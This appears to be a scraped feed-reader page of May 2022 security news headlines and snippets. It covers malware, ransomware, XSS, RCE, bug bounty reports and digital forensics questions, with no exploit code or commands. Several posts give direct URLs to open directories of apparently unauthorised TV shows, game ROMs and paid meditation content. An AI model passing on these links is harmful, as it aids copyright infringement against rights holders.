    现阶段,国产化的技术、产品或服务依然面临着巨大挑战和苦难,那国产化进展到底如何?还有哪些疑难杂症有待解决?
    恶意软件构建工具 KurayStealer 浮出水面
    Uptycs 的研究人员近日发现了一个新的恶意软件构建工具 KurayStealer,被用于出售给犯罪分子使其更方便地构建恶意软件。
    Metastealer 接棒 Racoon stealer 进行窃密
    MetaStealer 是一个新出现的窃密恶意软件,该恶意软件旨在填补 2022 年 3 月份 Racoon stealer 停止运营带来的市场空白。
    FreeBuf早报 | 推特遭1.5亿美元巨额罚款 ;印度第二大航司遭勒索软件攻击
    美国联邦贸易委员会(FTC)将对推特处以 1.5 亿美元巨额罚款。
    「神剑攻防演练宝典」之“0day漏洞攻击调查”
    攻防演练中如何快速追踪异常、全面调查攻击链路?看神剑法宝“象守”的!
    成功逮捕!SilverTerrier团伙头目被尼日利亚警方控制
    尼日利亚警方于近日在拉各斯逮捕了网络犯罪团伙SilverTerrier的疑似头目。
    ChromeLoader恶意软件激增,恐将威胁全球浏览器
    相较年初以来的稳定,ChromeLoader恶意软件的数量在本月有所上升。
    因欺骗性定向广告,推特遭1.5亿美元巨额罚款
    因欺诈性广告,美国联邦贸易委员会 (FTC)将对推特处以 1.5亿美元巨额罚款。
    新型勒索软件Cheers正攻击VMware ESXi 服务器
    VMware ESXi 是全球大型组织普遍使用的虚拟化平台,因此对其进行加密勒索通常会严重破坏企业的运营。
  • Open

    How to Detect TOR Network Connections with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive and POC
    submitted by /u/scopedsecurity [link] [comments]
    Improving the ICS-OT Vulnerability Disclosure Process Between Researchers and Vendors
    submitted by /u/derp6996 [link] [comments]
    VirtualBox leaks host ring 0 SIMD registers into guest ring 3
    submitted by /u/zx2c4 [link] [comments]
  • Open

    Intro to Web App Security Testing: Burp Suite Tips & Tricks
    A brief list of useful things we wish we had known sooner Burp Suite Pro can be complicated and intimidating. Even after learning and becoming comfortable with the core functionality, there remains a great deal of depth throughout Burp Suite, and many users may not stray far from the staples they know. However, after years... The post Intro to Web App Security Testing: Burp Suite Tips & Tricks appeared first on TrustedSec.
  • Open

    Letsdefend.io EventID 116
    The alert with EventID 116 shows that Javascript code is detected in URL. Continue reading on Medium »

  • Open

    What was Bryan Neumeister talking about in the Johnny Depp defamation case?
    Can someone go into detail about what exactly Bryan Neumeister was talking about in the Johnny Depp defamation case? submitted by /u/YungTerpenzee [link] [comments]
    Book suggestions for digital forensics enthusiast
    Hello Guys, Am interested in digital forensics and wish to read some good books on it. It may be as an introduction to this domain which is easy to understand, written by a field expert and maybe fun to read but should illustrate well about the domain. Please do suggest books or post links to purchase. TIA :) submitted by /u/the_bearded_madrasi [link] [comments]
    virtual chain of custody
    Anyone have an process for virtual chain of custody? Like if I client sends you a VM or AWS snapshot. Do you record chain of custody? Curious what other groups do. submitted by /u/CrazyKitty2016 [link] [comments]
    Examiners in the field, what happens with a case and its evidence if the device is infected with malware?
    Hello all, I am a junior malware analyst/IR and am currently writing my undergraduate thesis for a B.S. in Computer Forensics. For my thesis, I am gearing towards a malware angle applied to digital forensics since those are both my passions. I have conducted extensive research, but one thing I cannot get a solid grasp on is what happens to an investigation when the examiner(s) confirm that the device is infected with malware. Does the investigation continue regardless and all pertinent evidence per the limits of the warrant is documented as normal? Or does the investigation pause and the device is handed off to a third-party to conduct professional malware analysis on the device to determine if evidence has been either generated by the malware itself or tampered with? submitted by /u/ringzero_ [link] [comments]
    Advice considering a career in computer forensics
    I currently have a bachelor's degree in computer & information technology and am currently working towards getting a master's degree in computer technology and data science. I always imagined that my degrees would lead me to a career in programming. However, I have recently learned about computer forensics and it sounds like a fun and interesting career. What sort of requirements and training are needed for a career in this field? I probably would want a job assisting police and law enforcement in investigations. What sort of salary would a job like this have, and what benefits and drawbacks would a job like this have? I have a limited knowledge of what the job market is like for this profession so any information would be nice! submitted by /u/No_Curve_3351 [link] [comments]
  • Open

    Pre-hijacked accounts (pdf, research paper)
    submitted by /u/ScottContini [link] [comments]
    Zoom RCE via "xmpp stanza smuggling"
    submitted by /u/phree_radical [link] [comments]
    RCE over ham radio - Reverse shell via WinAPRS
    submitted by /u/rickostuff [link] [comments]
    Security Code Audit - For Fun and Fails
    submitted by /u/scopedsecurity [link] [comments]
    Tetragon: case study of security product's self-protection
    submitted by /u/hardenedvault [link] [comments]
    seL4 Whitepaper released.
    submitted by /u/providerstatistics [link] [comments]
    The printer goes brrrrr!!!
    submitted by /u/0xdea [link] [comments]
    Finding Bugs in Windows Drivers, Part 1 – WDM
    submitted by /u/jat0369 [link] [comments]
  • Open

    Vulnerability In PayPal worth 200000$ bounty
    Article URL: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc Comments URL: https://news.ycombinator.com/item?id=31510256 Points: 1 # Comments: 1
    Security Vulnerability in Tor Browser
    Article URL: https://darknetlive.com/post/psa-security-vuln-in-tor-browser/ Comments URL: https://news.ycombinator.com/item?id=31509777 Points: 187 # Comments: 94
    Serious security vulnerability in Tails 5.0
    Article URL: https://tails.boum.org/security/prototype_pollution/index.en.html Comments URL: https://news.ycombinator.com/item?id=31501499 Points: 4 # Comments: 0
  • Open

    How I made it into the United Nations hall of fame as I slept
    This article is going to be about how I got my name in the United Nations hall of fame for finding a reflected XSS bug as I slept. Continue reading on Medium »
    2fa bypass again
    Hello My Dear Buggies!!! Continue reading on Medium »
    Atlassian Jira Seraph Authentication Bypass RCE
    CVE-2022–0540 Continue reading on Medium »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Secure Code Review -1 | Cheat sheet For Security Vulnerability In Python — Injection Flaws
    Based on OWASP Top-10 Vulnerabilities. This time we are looking for secure coding bugs related to Injection Flaws Continue reading on InfoSec Write-ups »
    My Blackhat stories- How I hacked a college and paid my friend's fees
    Intro: Continue reading on Medium »
    How I was able to hack A Panel PHP Material_Wallpaper(solodroid)&Viaviweb
    Hello everyone, I’m “the injector ”, I’m a network administrator and a bug bounty hunter, today i will show you how im hack a panel of php… Continue reading on Medium »
  • Open

    Lot of old cartoons, some spanish
    http://fina.dyndns.tv/Cartoons/ Go up a directory for other media submitted by /u/inoculatemedia [link] [comments]
    torrent RSS feeds of premium leftie podcasts
    submitted by /u/kBr9gFITLKkTVSEiQ6PJ [link] [comments]
  • Open

    Taking ESF For A(nother) Spin
    2+ years ago from the date of this blog post I wrote my initial blog post where I started becoming familiar with Apple’s Endpoint Security… Continue reading on Medium »
    Attack and Hunting Lateral Movement with Service Control Manager(SVCCTL)
    There are some lateral movement techniques that don't rely on vulnerabilities, like WMI, PsExec and Dcom. These methods require that… Continue reading on Medium »
  • Open

    War in Ukraine / May 24
    👉 The greatest air battle of the 21st Century [Expert View] Continue reading on Medium »
    Approaching CTF OSINT Challenges — Learn by Example
    New to OSINT challenges? Based on examples from the recent 2022 NahamCon CTF, I provide general recommendations on solving OSINT challenges. Continue reading on InfoSec Write-ups »
  • Open

    "vPub v5" opensource online Party! - this Thursday at 4 PM UTC
    submitted by /u/Mike-Banon1 [link] [comments]
  • Open

    Blind XSS in app.pullrequest.com/ via /reviews/ratings/{uuid}
    HackerOne disclosed a bug submitted by bugra: https://hackerone.com/reports/1558010 - Bounty: $2500
    Stored XSS in Notes (with CSP bypass for gitlab.com)
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1481207 - Bounty: $13950
    Email templates XSS by filterXSS bypass
    Judge.me disclosed a bug submitted by caue: https://hackerone.com/reports/1404804 - Bounty: $1250
  • Open

    SecWiki News 2022-05-25 Review
    HTB-467-Noter by o1hy Gmail对附件的限制 by ourren IEEE S&P 2022 云端报道(3) by ourren IEEE S&P 2022 云端报道(2) by ourren IEEE S&P 2022 云端报道(1) by ourren 云原生安全Tetragon案例之安全产品自防护 by ourren SHADEWATCHER: 基于系统审计记录和推荐概念的网络威胁分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-25 Review
    HTB-467-Noter by o1hy Gmail对附件的限制 by ourren IEEE S&P 2022 云端报道(3) by ourren IEEE S&P 2022 云端报道(2) by ourren IEEE S&P 2022 云端报道(1) by ourren 云原生安全Tetragon案例之安全产品自防护 by ourren SHADEWATCHER: 基于系统审计记录和推荐概念的网络威胁分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor
    INTERPOL and The Nigeria Police Force arrested a prominent business email compromise actor as part of Operation Delilah. The post Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor appeared first on Unit42.
  • Open

    How to conduct a security audit of Power BI?
    I want to conduct a security audit of Power Bi. What I mean by security audit: 1) List of all workspaces; 2) List of all reports/dashboards/etc and permissions (who have access and with whom shared) Do you know what role I need in O365 to have permission to see such information? Right now I can see only "My workspace", but I need a list of all workspaces of my organization. Does someone have experience with security assessment/audit of Power Bi? submitted by /u/athanielx [link] [comments]
    Security Testing/Assessment - Sharepoint Plugin
    How one can assess the security of available plugins for sharepoints? ​ AMREIN has a large number of plugins available. Business has requested security checks before purchase. Can someone share security checklist for plugins or available tools on web to test? What are the common concerns around plugins? submitted by /u/Anahata___ [link] [comments]
  • Open

    FreeBuf早报 | 澳印日美四国承诺深化数据安全合作;首个针对6G网络的攻击手法曝光
    澳大利亚、印度、日本和美国四国联盟的领导人24日进行了会晤,承诺在信息安全、数据共享等方面深化合作。
    端口扫描那些事
    请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
    【超详细】Vulnhub靶场之----DC-3
    超详细Vulnhub靶场之----DC-3分享学习。
    天翼云安全实验室 | 一次钓鱼邮件溯源的技术分享
    近期钓⻥邮件攻击事件频发,天翼云安全实验室选取了一封钓鱼邮件进行分析与溯源,同大家一起提高警惕,防御钓鱼邮件攻击。
    WEB安全基础篇-跨站脚本攻击(XSS)
    跨站脚本攻击(XSS)是客户端安全的头号大敌,OWASP TOP 10多次把xss列在榜首。
    网传搜狐遭遇史诗级邮件诈骗,张朝阳回应来了
    张朝阳称搜狐一个员工的内部邮箱密码被盗,骗子冒充财务部给员工发钓鱼邮件,总损失金额在5万元以内。
    勒索软件攻击正以惊人的速度增加
    根据最新报告,勒索软件泄露事件增加了 13%。
    小心你的钱包!微软警告更加隐蔽的支付凭证窃取攻击
    微软安全人员最近观察到使用多种混淆技术来避免检测的网页掠夺攻击。这些攻击大多被用来针对电商等平台以窃取用户支付凭证。
    鼎茂科技:数据+AI增强安全运营 | 网安新势力SOLO发布季
    解决各类数据治理问题,AIOps该如何贴近业务需求?网安新势力SOLO发布季告诉你答案。
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview

  • Open

    Critical broken cookie signing on dagobah.flickr.com
    Flickr disclosed a bug submitted by ian: https://hackerone.com/reports/1440290 - Bounty: $479
    [com.exness.android.pa Android] Universal XSS in webview. Lead to steal user cookies
    EXNESS disclosed a bug submitted by nearsecurity: https://hackerone.com/reports/532836 - Bounty: $400
    Cross-site scripting on dashboard2.omise.co
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1532858 - Bounty: $200
  • Open

    Windows Firewall Event Logs
    I have a ransomeware attack and am looking at several event logs from a local machine on the network that show rules being added, changed, and deleted reference the Windows Firewall. These events are consistent on almost a daily basis and occur almost exclusively during the early morning hours when the business was closed for several weeks leading up to the implementation of the ransomeware. Other than the attackers, is there any normal circumstances that may have caused this on such a consistent basis, such as normal updates? With that being said, I am limited on verifying a lot of evidence as the business had already wiped their servers and most local machines by the time I got involved… so I’m pretty much limited to this single computer to figure out what I can. submitted by /u/outdorksman [link] [comments]
    Practice Investigating Linux Systems using only Linux CLI + Cyber5W Mini CTF Hints
    submitted by /u/DFIRScience [link] [comments]
    Private Investigator / DFIR crossover?
    Some of my coworkers have their PI licenses, and becoming a DF/PI consultant is something that I've toyed with. I have intelligence and an LE background, so it's not a crazy idea. Does anyone have any experience going this route? TIA! submitted by /u/FAlady [link] [comments]
    Postgraduate Degree Dilemma
    I am 22 and i just graduated with Bcs Computer and Digital Forensics Degree. I am considering to take a master degree but i didn’t decide yet what to do. My first choice is to continue in relevant field of my bachelor degree and pursuing further education on Digital Forensics with Masters like Msc Cybersecurity, Msc Digital Forensics or Msc Advance Computer Science. My second option is to take a LLM Cyber Law Master as i was always interested on this area. My concern is wether the LLM Cyber Law degree will actual help me and reinforce my bachelor degree and give me a good combination of degrees to Job field, rather be an irrelevant master degree. Another thing,Is it good idea to study LLM Cyber Law without having a basic Law degree and how this will effect me in Job field. Im really trying to figure out what you think is best from your perspective.I want to hear any advice or recommendations you may have. submitted by /u/AshMustard15 [link] [comments]
  • Open

    How to Buy X Doge Token ($X) — Beginner’s Guide
    Continue reading on Medium »
    VulnHub: CySec: 2
    Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to… Continue reading on Medium »
  • Open

    Multiple vulnerabilities in radare2
    submitted by /u/soupcreamychicken [link] [comments]
    Malware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof of Concept to Deliver Cobalt-Strike Beacon
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    fire: Fast tool to filter resolved domains (good for Bug Bounty purposes in a pipeline of scripts)
    submitted by /u/deleee [link] [comments]
    New Rhino Blog Post: CVE-2022-25237: Bonitasoft Authorization Bypass and RCE
    submitted by /u/hackers_and_builders [link] [comments]
    GitHub - Peco602/findwall: Check if your provider is blocking you!
    submitted by /u/Peco602 [link] [comments]
    Cisco Issues Patch for New IOS XR Zero-Day Vulnerability Exploited in the Wild
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    River: a tool for quantitative media analysis
    A web app for tracking and comparing new agencies’ reporting on the Russia-Ukraine war. Continue reading on Medium »
    War in Ukraine / May 23
    The war in the center of Europe has been going on for three months Continue reading on Medium »
    Check Which APT Group Targets your Organization
    Today we will see how to identify which APT Group is interested in your organization to attack. Continue reading on Medium »
  • Open

    GitBook Email HTML INJECTION
    Halo teman teman perkenalkan nama saya Mohammad Alfin Hidayatullah, Saya adalah seorang Bug Bounty Hunter. Kali ini saya akan membagi… Continue reading on Medium »
    Bware Labs Bets $100,000 on Blast quality by launching a Bug Bounty campaign
    We are thrilled to announce the launch of our bug bounty program on Blast, in partnership with Immunefi, Web3’s leading bug bounty… Continue reading on Bware Labs »
    How I found SSRF external interaction on Bugcrowd Public program in 5 min
    Tools - https://subdomainfinder.c99.nl/ - burp suite - burp Collaborator  - assetfinder : https://github.com/tomnomnom/assetfinder - httpx… Continue reading on Medium »
    How to effectively hunt for vulnerabilities in Wordpress Sites
    Hi Sleepyheads! Miss me? Continue reading on Medium »
    HTTP Response Splitting [CWE-113] — The Hacktivists
    HTTP Response Splitting weakness describes improper neutralization of CRLF sequences in HTTP headers. Continue reading on Medium »
    Improper Handling of Length Parameter Inconsistency [CWE-130] — The Hacktivists
    Improper Handling of Length Parameter Inconsistency is a security weakness that describes improper handling of a length field for… Continue reading on Medium »
    Off-by-one Error [CWE-193] — The Hacktivists
    Off-by-one error occurs when a program uses an improper maximum or minimum value that is one more or one less than the proper value. Continue reading on Medium »
    PHP File Inclusion [CWE-98] — The Hacktivists
    PHP File Inclusion weakness describes improper control of filename within Include() or Require() statements in a PHP program. Continue reading on Medium »
  • Open

    Event log persistence
    submitted by /u/Alareon [link] [comments]
  • Open

    SecWiki News 2022-05-24 Review
    基于XDR的网络安全体系思考与实践 by ourren SecWiki周刊(第429期) by ourren 基于嵌入的知识图谱实体对齐的基准研究 by ourren 针对域名历史信誉的潜在滥用 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-24 Review
    基于XDR的网络安全体系思考与实践 by ourren SecWiki周刊(第429期) by ourren 基于嵌入的知识图谱实体对齐的基准研究 by ourren 针对域名历史信誉的潜在滥用 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Creating Reverse C2 Channel with C# Powershell and Python
    I know C2 servers are always handy, especially when they bypass most of Anti-Virus solutions. Continue reading on Medium »
  • Open

    Pwnton Pack: An Unlicensed 802.11 Particle Accelerator
    This past Christmas, I received a terrific gift from my in-laws: a replica Ghostbusters Proton Pack. I was thrilled. You see, growing up in the mid 80s, Ghostbusters was my jam. Fast forward 37 years and with the recent Ghostbusters: Afterlife film release, my nostalgia was hitting a fever pitch. Shortly after our Christmas dinner,... The post Pwnton Pack: An Unlicensed 802.11 Particle Accelerator appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 马克·扎克伯格因数据泄露事件被起诉;国家网络武器将很快在暗网上出现
    国际刑警组织秘书长Jurgen Stock警告,由国家开发的网络武器会在“几年”后出现在暗网上。
    2021 Owasp top 10 逐个击破,A02 Cryptographic Failures
    以前称为敏感数据暴露,像是一种广泛的症状而不是根本原因,重点是与密码相关的失败(或缺乏密码)。这通常会导致敏感数据的泄露。
    招聘丨度小满金融安全部等待着你的到来
    度小满金融,致力于用科技为更多人提供值得信赖的金融服务。2018年4月28日,百度旗下金融服务事业群组完成拆分融资,启用全新品牌“度小满金融” 。
    奥地利、爱沙尼亚重要机构或正成为俄黑客目标
    由俄罗斯政府支持的黑客组织“图拉”(Turla)正在对奥地利经济商会、北约平台、波罗的海国防学院发动一系列攻击。
    《关于推进实施国家文化数字化战略的意见》发布,再次强调数据安全
    《意见》明确,到“十四五”时期末,基本建成文化数字化基础设施和服务平台,形成线上线下融合互动、立体覆盖的文化服务供给体系。
    通用汽车遭撞库攻击被暴露车主个人信息
    经调查后发现黑客在某些情况下将客户奖励积分兑换为礼品卡。
    支付巨头PayPal曝大漏洞,黑客可直接窃取用户资金
    其攻击原理是利用点击劫持技术诱导用户进行点击,在不知不觉中完成交易,最终达到窃取资金的目的。
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »

  • Open

    Open redirect bypass
    Flickr disclosed a bug submitted by xlord91: https://hackerone.com/reports/1513031 - Bounty: $300
    Stored XSS in photos_user_map.gne
    Flickr disclosed a bug submitted by keer0k: https://hackerone.com/reports/1534636 - Bounty: $3263
    [python]: Zip Slip Vulnerability
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1572496 - Bounty: $1000
    [Java]: Flow sources and steps for JMS and RabbitMQ
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1579235
  • Open

    How can I download full folders on my android phone keeping directory structure?
    I tried using 1DM but it puts all files into the same directory. I tried using grabber, changing the recursion, batch downloads, etc but I am not getting this to work. I read through the sticky post but it didn't seem to have the answer. Any recommendations? submitted by /u/Terrible_Feature-532 [link] [comments]
    batch of movies
    submitted by /u/wiener_dawg [link] [comments]
    [Request] Anyone has the TV shows: Blossom (1990) & Brotherly Love (1995)
    submitted by /u/ShakeSpearow [link] [comments]
  • Open

    Ukraine Update 5–23–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    War in Ukraine / May 20–22
    Up to 100 Heroes of Ukraine die every day in the East Continue reading on Medium »
    KILLNET, LEGION, MIRAI & co.: Breve OSINT sugli obiettivi italiani e relativo rischio.
    E’ dell’11 maggio la notizia su Repubblica: “Attacco hacker all’Italia. Cos’è Killnet, il gruppo russo che lo ha rivendicato”… Continue reading on Medium »
    OSINT Course Online (Open-source Intelligence)
    In this course, you will learn about OSINT (open-source intelligence) from a hacker’s point of view. Continue reading on Medium »
    My speech in the Russian Parliament will take place in June
    My speech at the Federation Council of the Russian Federation on the creation in Russia of a specialized center of competence in the field… Continue reading on Medium »
  • Open

    A few Tailscale tricks for security testers
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Hiding MSFVENOM Payloads in USB NIC EEPROM
    submitted by /u/lightgrains [link] [comments]
    Beneath the surface: Uncovering the shift in web skimming
    submitted by /u/SCI_Rusher [link] [comments]
    mx-takeover focuses DNS MX records and detects misconfigured MX records.
    submitted by /u/0xmusana [link] [comments]
    I wrote this more from an "analyze rootkit" perspective, but it's equally as valid for "driver bug hunting". Hope you enjoy.
    submitted by /u/0x4ndr3 [link] [comments]
    Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
    submitted by /u/0xdea [link] [comments]
  • Open

    Bug Bounty Diaries #3
    Hi guys! I’m back and before starting with the new blog I really wanna say THANK YOU to every follower, I’m glad to know that my blogs can… Continue reading on Medium »
    Miniseries: XSS to the core — Pt.2
    In the second part of our mini-series, we are going to look at the types of XSS and what we can do to evade those pesky filters! In the… Continue reading on Medium »
    Postponing TGE
    Dear Hats community, Continue reading on Medium »
    Top 25 SSRF Dorks | Bug Bounty
    Top 25 Server-Side Request Forgery (SSRF) Dorks Continue reading on Medium »
    Autorização de nível de objeto quebrado.
    Dando continuação a vulnerabilidades em API. Continue reading on Medium »
    Autenticação de usuário quebrada.
    Pretendo compartilhas com vocês algumas coisas que aprendi em livros e artigos, acredito que isso possa te ajudar. Continue reading on Medium »
    CVE-2022–1813 Blind Command Injection
    This Bug founded by Abdulrahman Abdullah. This is a python based web application in which there is no proper check on url parameter which… Continue reading on Medium »
    How I Get Bounty From Takeover Account
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    Kind of a Wifi attack that isn't Evil Twin
    I wanted to know kind of wifi attack, such as Evil-Twin with Captive portal, that possible to implement the process or the idea behind that. Thank you submitted by /u/Echowns [link] [comments]
    Best path to cybersecurity as a self-taught developer
    Hello, so I currently have around 5 free months and I wanted to heavily utilize that time towards learning to program. My long-term goal would be to get into the cyber security field but I don't have the money to go for the relevant certifications at the moment. I wanted to know which options any of you think would equip me with the most transferable skills for when I finally make the switch into cyber sec. Because I figure it would be easier to get my foot into the IT industry as a developer. For example, I'm guessing that a full stack web developer would make a good transition into web security, or a software developer would do well in Application security. Given your expertise/knowledge of the field, which path would you take if you were to start out as a developer? submitted by /u/Shogun8693 [link] [comments]
  • Open

    SecWiki News 2022-05-23 Review
    GitHub Copilot的安全性评估 by ourren PE文件结构解析2 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-23 Review
    GitHub Copilot的安全性评估 by ourren PE文件结构解析2 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    The Hunt for the Red Team
    Red teaming is an important part of any security program because it gives you a real world exercise to test your security posture. You may… Continue reading on Medium »
    How do Red Team Exercises help CISO to Validate the Security Controls Effectively?
    Red Team Exercises are one of the best ways for CISOs to validate the security controls effectively. Continue reading on Medium »
  • Open

    【安全通报】Fastjson 1.2.80 及之前版本存在 Throwable 反...
    近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致...
  • Open

    【安全通报】Fastjson 1.2.80 及之前版本存在 Throwable 反...
    近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致...
  • Open

    Vulnerability that made us 30 000$ richer
    Article URL: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ Comments URL: https://news.ycombinator.com/item?id=31477994 Points: 2 # Comments: 1
  • Open

    Tryhackme’s OWASP Top 10
    So I have made it through a dozen or so hours of Tryhackme’s free learning path and am enjoying it, also have made through the first 6… Continue reading on Medium »
  • Open

    Recurrence and analysis of RPC high-risk Vulnerability(CVE-2022-26809)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1906/ 1.Vulnerability introduction It has been more than a month since the high-risk vulnerability CVE-2022-26809 was rep...
  • Open

    Recurrence and analysis of RPC high-risk Vulnerability(CVE-2022-26809)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1906/ 1.Vulnerability introduction It has been more than a month since the high-risk vulnerability CVE-2022-26809 was rep...
  • Open

    FreeBuf早报 | 韩国和美国总统联手应对朝鲜的网络攻击;俄遭网络攻击成倍上升
    韩国和美国总统联手应对朝鲜的网络攻击。
    埃隆•马斯克“助长”加密货币新骗局
    近日,有观察发现,诈骗者正在深度伪造埃隆·马斯克和其他知名加密货币倡导者的视频以推广BitVex交易平台并窃取存储货币。
    谷歌:Predator间谍软件使用零日漏洞感染Android设备
    国家支持的威胁行为者使用五个零日漏洞来安装由商业监控开发商Cytrox开发的Predator间谍软件。
    思科修复在野被利用的iOS XR漏洞
    思科解决了一个影响 iOS XR 软件的中等严重性漏洞,该漏洞在野外被积极利用。
    Pwn2Own 2022比赛最后一日,Windows 11接连被黑3次
    参赛者主要利用了Win11的权限提升漏洞。
    请注意,PDF正在传播恶意软件
    安全研究人员发现了一种新型的恶意软件传播活动,攻击者通过PDF附件夹带恶意的Word文档,从而使用户感染恶意软件。
    FreeBuf早报 | Conti勒索团伙宣布停运;美国司法部不再起诉白帽黑客
    据美国司法部公布一项政策调整,将不再对违反美国联邦黑客法《计算机欺诈与滥用法》(CFAA)的善意安全研究提起诉讼。

  • Open

    Secure Home Network
    Hello People, I would like to start making my private network more secure soon. Since I am forced by my provider to use a coaxial connection, this would have to be included in the IAD/router. What would you guys recommend for components for me to set up? Does it make sense to create a VLAN | Subnet on the home network? I don't have a lot of space unfortunately. Thank you in advance! submitted by /u/D3ATHB1RD [link] [comments]
    burp vs zap
    I have been solving portswigger labs... And due to burps intruder low speed switched to zap And now I can't solve a lab even after looking at the solutions... WTF please put me on the right path!! submitted by /u/Full_Albatross_5636 [link] [comments]
  • Open

    Mortar Loader v2 - 0xsp SRD
    submitted by /u/dmchell [link] [comments]
  • Open

    Ukraine Update 5–22–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    Goodources on the war in Ukraine
    Wanted to share a list of resources that I find useful for researching aspects on the war in Ukraine: Continue reading on Medium »
    Viewing cyber attacks in real time on a world map
    There’s a couple of various resources available to see cyber attacks in real time around the world. These are helpful from an OSINT… Continue reading on Medium »
    Cybersecurity attacks against .RU
    Since the expansion of the war in Ukraine by Russia, there has been a barrage of cyber attacks against the Russian Federation from around… Continue reading on Medium »
    SPY NEWS: 2022 — Week 20
    Summary of the espionage-related news stories for the Week 19 (15–21 May) of 2022. Continue reading on Medium »
  • Open

    Email Verification Bypass by bruteforcing when setting up 2FA
    Evernote disclosed a bug submitted by cyberworlcload: https://hackerone.com/reports/1394984 - Bounty: $150
    Possible Domain Takeover on AWS Instance.
    Rocket.Chat disclosed a bug submitted by samuelsiv: https://hackerone.com/reports/1390782
  • Open

    Bypassing LDAP Channel Binding when LDAP Signing is not Enforced
    Hello folks (nerds), I happen to come across some new research that enables to completely bypass Active Directory (AD) Lightweight… Continue reading on Medium »
    Offensive and Defensive Security: CyberSec teams with Red and Blue Jerseys.
    Red teams simulate attacks in opposition to Blue teams to check the effectiveness of their infrastructure security. These exercises offer a Continue reading on Medium »
  • Open

    How does everyone find the directories?
    I don’t understand how people can find such random things? Do y’all simply google stuff or what? submitted by /u/StupidRedditorBTW [link] [comments]
    All Headspace meditations (till 2020) + Game ROMS of old consoles (GBA, NDS, etc...) + Popular TV shows + more random stuff
    Headspace: http://kbranch.us/public/Headspace%20-%20Meditation%20and%20Mindfulness%20Made%20Simple%20(2018)//) ROMS of old games: http://kbranch.us/public/ROMs/ TV shows: http://kbranch.us/public/tv/ And some more random stuff at http://kbranch.us/public/ submitted by /u/Pelicaros [link] [comments]
    Hundreds of gigabytes of TV series, music and movies. (In Russian)
    http://195.93.160.105/ submitted by /u/i-miss-you-so-much [link] [comments]
    A collection of mostly soviet-era cartoons (cheburashka for example)
    http://www.shchupak.com/multiki/ submitted by /u/i-miss-you-so-much [link] [comments]
    Tesla Service Manuals (Google Drive)
